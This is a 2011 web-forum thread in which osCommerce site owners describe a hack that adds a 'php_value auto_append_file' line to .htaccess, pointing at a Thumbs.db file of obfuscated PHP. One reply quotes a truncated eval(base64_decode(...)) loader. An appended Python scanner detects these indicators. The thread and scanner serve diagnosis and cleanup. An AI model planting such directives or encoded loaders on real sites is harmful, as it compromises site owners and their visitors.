torrent Posted June 8, 2011

This has happened two times now - my site goes down and I get an "internal server error" message. The first time it happened I noticed that my .htaccess file had been modified the day before, so I opened it and found just the code "php_value auto_append_file /home/content/b/1/8/b******/html/Thumbs.db". Just a blank page with that code. The second time it happened it left the original .htaccess code and just wrote it at the bottom of the page. I did a search of my entire site and cannot find a string in my code that says anything like that which might be causing it... I'm sure changing the permissions on it would fix it, but I would like to find the cause if possible, thanks!

ozEworks Posted June 8, 2011

I suggest you contact your hosting company for support on this. They can possibly look at logs to determine how the file was updated. It is possible some kind of hack has occurred.

burt Posted June 8, 2011

Kym is correct, this is a hack - definitely. The auto_append_file hack is quite well known and is a much "better" hack than is usually seen.

What happens is this: a file is uploaded to your site, or the server (usually deep in /usr/). This file would contain the hack code, or link spam or whatever. Usually obfuscated and can be cookied. The auto_append_file command adds the content of the file onto each .php page, and if cookied can be set to do all sorts of things (e.g., show links for 1 visit once per day)...making it very hard to detect.

NodsDorf Posted June 8, 2011

I've dealt with this before myself. At the time I worked with the host, who said no person had logged in via FTP or cPanel to the site except me, which led me to believe it was a security hole in the person's site's osCommerce that wasn't fixed. After doing all the security updates to the site and cleaning the site, it appeared again about 2 weeks later.

Turns out that there was a seemingly harmless file in the catalog called account_history_full.php. I found this wasn't a part of any add-on or normal osCommerce file; it was an encoded eval base64 code that was getting called remotely. Killing that and setting the permission on the .htaccess to 444 seemed to fix this issue, or at least I haven't had them say anything.

Hope that helps,
Don

torrent Posted July 8, 2011

Thank you for your replies. I have just been dealing with it by 444ing my .htaccess file, but now that I know it's something malicious causing it I will look into it further. It seems every time I fix a security hole in osCommerce I get hacked through another one. These idiots have too much time on their hands. Thanks again!

KojiOhashi Posted September 6, 2011

Sorry, I'm not good at English. The same phenomenon is occurring on the website that I have. I found multiple "Thumbs.db" files on the website. Certain malicious PHP code is written in them. The PHP code is encrypted, and decoding is difficult, but it is as follows.

-----------------------------------------------------------------------
<?php
@eval(base64_decode(
"aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU...
...skhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ=="));
?>
-----------------------------------------------------------------------

Please check for "Thumbs.db" on your website. Also, the update date/time (timestamp) of "Thumbs.db" is the same as that of ".htaccess". I think that this problem is resolved by deleting "Thumbs.db". Thanks.

NodsDorf Posted September 7, 2011

> Sorry, I'm not good at English. The same phenomenon is occurring on the website that I have. I found multiple "Thumbs.db" files on the website. Certain malicious PHP code is written in them. The PHP code is encrypted, and decoding is difficult, but it is as follows.
>
> -----------------------------------------------------------------------
> <?php
> @eval(base64_decode(
> "aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU...
> ...skhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ=="));
> ?>
> -----------------------------------------------------------------------
>
> Please check for "Thumbs.db" on your website. Also, the update date/time (timestamp) of "Thumbs.db" is the same as that of ".htaccess". I think that this problem is resolved by deleting "Thumbs.db". Thanks.

Any and all eval(base64_decode( .....) is hack code. It needs to be removed. You might also see a php prepend value in your .htaccess file. That line needs to be removed.

Thumbs.db is a Windows image caching file (anybody who uses Vista or later will see them all over their system's folders). They are safe to delete in all cases and have no legitimate reason to be on a Linux server.

After you clean everything you need to check all your files, and you should do all the security updates here.

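
Added example (not part of any post in this thread, and not osCommerce code): a Python check that walks a web root and reports the three indicators the replies describe, namely an auto_append_file/auto_prepend_file directive in .htaccess, eval(base64_decode( in any file, and a Thumbs.db that contains PHP. The function names, the sample tree and the /var/www/html path are assumptions made for the illustration.

```python
import os
import re
import tempfile

# Indicators named in the thread; the sample data below is constructed.
DIRECTIVE = re.compile(rb"^\s*php_value\s+auto_(append|prepend)_file\s+(\S+)", re.I | re.M)
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)

def scan_webroot(root):
    """Return sorted (relative path, reason) pairs for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # bound memory use per file
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            rel = os.path.relpath(path, root)
            if name == ".htaccess":
                for m in DIRECTIVE.finditer(data):
                    target = m.group(2).decode(errors="replace")
                    kind = m.group(1).decode().lower()
                    findings.append((rel, "auto_%s_file -> %s" % (kind, target)))
            if EVAL_B64.search(data):
                findings.append((rel, "eval(base64_decode("))
            if name.lower() == "thumbs.db" and b"<?php" in data:
                findings.append((rel, "Thumbs.db contains PHP"))
    return sorted(findings)

def build_sample(root):
    """Write a constructed web root; the encoded string is a harmless placeholder."""
    samples = {
        ".htaccess": b"Options -Indexes\nphp_value auto_append_file /var/www/html/Thumbs.db\n",
        "Thumbs.db": b'<?php @eval(base64_decode("cGxhY2Vob2xkZXI=")); ?>',
        "catalog/index.php": b"<?php echo 'storefront'; ?>",
        "catalog/images/Thumbs.db": b"\xd0\xcf\x11\xe0 constructed thumbnail-cache bytes",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan_webroot(tmp):
            print(rel, "|", reason)
```

A hit on the .htaccess directive names the file being appended, so that target is the next file to inspect even when it is not called Thumbs.db.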
This topic is now archived and is closed to further replies.